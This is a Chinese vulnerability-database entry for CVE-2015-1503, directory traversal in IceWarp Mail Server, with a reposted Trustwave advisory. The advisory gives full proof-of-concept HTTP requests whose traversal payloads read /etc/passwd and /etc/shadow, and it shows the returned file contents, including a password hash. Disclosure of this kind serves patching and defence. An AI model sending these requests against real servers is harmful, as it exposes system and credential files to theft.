CVE-2015-1503
CVSS7.8
发布时间 :2018-05-08 16:29:00
修订时间 :2018-06-12 14:03:31
NMP    

[原文]Multiple directory traversal vulnerabilities in IceWarp Mail Server before 11.2 allow remote attackers to read arbitrary files via a (1) .. (dot dot) in the file parameter to a webmail/client/skins/default/css/css.php page or .../. (dot dot dot slash dot) in the (2) script or (3) style parameter to webmail/old/calendar/minimizer/index.php.


[CNNVD]CNNVD数据暂缺。


[机译]Google 翻译(企业版):

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-22 [对路径名的限制不恰当(路径遍历)]

- CPE (受影响的平台与产品)

cpe:/a:icewarp:mail_server:9.3.1
cpe:/a:icewarp:mail_server:9.3.2
cpe:/a:icewarp:mail_server:9.4.0
cpe:/a:icewarp:mail_server:9.4.1
cpe:/a:icewarp:mail_server:9.4.2
cpe:/a:icewarp:mail_server:10.0.3
cpe:/a:icewarp:mail_server:10.0.4
cpe:/a:icewarp:mail_server:10.0.5
cpe:/a:icewarp:mail_server:10.0.6
cpe:/a:icewarp:mail_server:10.0.7
cpe:/a:icewarp:mail_server:10.0.8
cpe:/a:icewarp:mail_server:10.1.0
cpe:/a:icewarp:mail_server:10.1.1
cpe:/a:icewarp:mail_server:10.1.2
cpe:/a:icewarp:mail_server:10.1.3
cpe:/a:icewarp:mail_server:10.1.4
cpe:/a:icewarp:mail_server:10.2.0
cpe:/a:icewarp:mail_server:10.2.1
cpe:/a:icewarp:mail_server:10.2.2
cpe:/a:icewarp:mail_server:10.3.0
cpe:/a:icewarp:mail_server:10.3.1
cpe:/a:icewarp:mail_server:10.3.2
cpe:/a:icewarp:mail_server:10.3.3
cpe:/a:icewarp:mail_server:10.3.4
cpe:/a:icewarp:mail_server:10.3.5
cpe:/a:icewarp:mail_server:10.4.0
cpe:/a:icewarp:mail_server:10.4.1
cpe:/a:icewarp:mail_server:10.4.2
cpe:/a:icewarp:mail_server:10.4.3
cpe:/a:icewarp:mail_server:10.4.4
cpe:/a:icewarp:mail_server:10.4.5
cpe:/a:icewarp:mail_server:11.0.0
cpe:/a:icewarp:mail_server:11.0.1
cpe:/a:icewarp:mail_server:11.1.0
cpe:/a:icewarp:mail_server:11.1.1
cpe:/a:icewarp:mail_server:11.1.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1503
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1503
(官方数据源) NVD

- 其它链接及资源

http://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html
(VENDOR_ADVISORY)  MISC  http://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html
https://www.exploit-db.com/exploits/44587/
(VENDOR_ADVISORY)  EXPLOIT-DB  44587
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614
(VENDOR_ADVISORY)  MISC  https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614

- 漏洞信息 (F147505)

IceWarp Mail Server Directory Traversal (PacketStormID:F147505)
2018-05-04 00:00:00
Piotr Karolak  trustwave.com
exploit,file inclusion
CVE-2015-1503
[点击下载]

IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.

Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 11.1.1 and below
 
Product description: 
IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection.
IceWarp Mail Server is a commercial mail and groupware server developed by IceWarp Ltd. It runs on Windows and Linux.
 
Finding 1: Multiple Unauthenticated Directory traversal
Credit: Piotr Karolak of Trustwave's SpiderLabs
CVE: CVE-2015-1503
CWE: CWE-22
 
#Proof of Concept
 
The unauthenticated Directory Traversal vulnerability can be exploited by
issuing a specially crafted HTTP GET request to the
/webmail/client/skins/default/css/css.php. Directory Traversal is a
vulnerability which allows attackers to access restricted directories and
execute commands outside of the web server's root directory.
 
This vulnerability affects /-.._._.--.._1416610368(variable, depending on
the installation, need to check page
source)/webmail/client/skins/default/css/css.php.
 
Attack details
URL GET input file was set to ../../../../../../../../../../etc/passwd
 
Proof-of-Concept:
 
The GET or POST request might be sent to the host A.B.C.D where the IceWarp mail server is running:
 
REQUEST
=======
GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=../../../../../../../../../../etc/passwd&palette=default&skin=default HTTP/1.1
Referer: http://a.b.c.d/
Cookie: PHPSESSID_BASIC=wm-54abaf5b3eb4d824333000; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
 
 
RESPONSE:
=========
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
 
....TRUNCATED
 
test:x:1000:1000:test,,,:/home/test:/bin/bash 
smmta:x:116:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false 
smmsp:x:117:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false 
mysql:x:118:127:MySQL Server,,,:/nonexistent:/bin/false 
 
The above proof-of-concept would retrieve the /etc/passwd file (the
response in this example has been truncated).
 
#Proof of Concept
 
The unauthenticated Directory Traversal vulnerability can be exploited by
issuing a specially crafted HTTP GET and POST request payload
..././..././..././..././..././..././..././..././..././..././etc/shadow
submitted in the script and/or style parameter.  Directory Traversal is a
vulnerability which allows attackers to access restricted directories and
execute commands outside of the web server's root directory.
 
The script and style parameters are vulnerable to path traversal attacks,
enabling read access to arbitrary files on the server.
 
REQUEST 1
=========
 
GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Referer: http://a.b.c.d/webmail/old/calendar/index.html?_n[p][content]=event.main&_n[p][main]=win.main.public&_n[w]=main
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en
 
REQUEST 2
=========
 
GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en
 
RESPONSE
========
HTTP/1.1 200 OK
Connection: close
Server: IceWarp/11.1.1.0
Date: Thu, 03 Jan 2015 06:44:23 GMT
Content-type: text/javascript; charset=utf-8
 
root:!:16436:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
games:*:16273:0:99999:7:::
man:*:16273:0:99999:7:::
lp:*:16273:0:99999:7:::
 
....TRUNCATED
 
lightdm:*:16273:0:99999:7:::
colord:*:16273:0:99999:7:::
hplip:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
smmta:*:16436:0:99999:7:::
smmsp:*:16436:0:99999:7:::
mysql:!:16436:0:99999:7:::


    
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站